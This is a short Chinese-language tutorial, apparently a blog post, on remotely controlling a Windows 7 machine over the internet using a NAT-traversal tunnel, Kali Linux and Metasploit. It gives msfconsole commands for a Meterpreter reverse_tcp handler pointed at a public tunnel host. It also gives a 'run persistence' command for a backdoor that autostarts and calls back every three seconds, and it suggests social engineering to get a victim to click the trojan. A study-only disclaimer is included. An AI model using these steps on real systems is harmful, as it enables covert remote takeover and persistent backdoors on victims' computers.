前言

实现外网控制需要一个外网的IP负责监听，本次使用的是https://www.fgnwct.com（飞鸽内网穿透）有免费的隧道 kali.org(kali官网) 详细教程查询官网。

此系列仅用于工作和学习，禁止用于非法攻击。一切遵守《网络安全法》

环境 windows7 kali linux 2021

下载客户端，解压出文件 ''NPC''

放到kali linux 桌面上

这里选择 tcp协议，本地端口随意填（最好不要填常用的可能被占用的端口）

复制命令，打开kali

网络选择（桥接模式）

在kali终端里面启动（要和npc文件在同一个路径下！）成功连上服务器

创建一个木马，这里要填服务器的！

打开msfconsole（输入以下命令）

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost [公网服务器的名称 如：free.svipss.top]
set lport [自己设置的隧道监听端口]
run

等待受害者点击此木马（可能要运用到社会工程学）

回到kali 木马连接成功

如果想要 木马持久化连接要用到别的模块

run persistence -X -i 3 -r [公网服务器名称 如：free.svipss.top] -p [公网端口]
-X                 //开机自启动
-i                 //回连的时间间隔 （-i 3 代表每3秒钟连接我们一次）
-r                 //目标机器 IP 地址（攻击主机）
-p                 //监听反向连接端口号

注（需要在windows7靶机上重启计算机才能实现）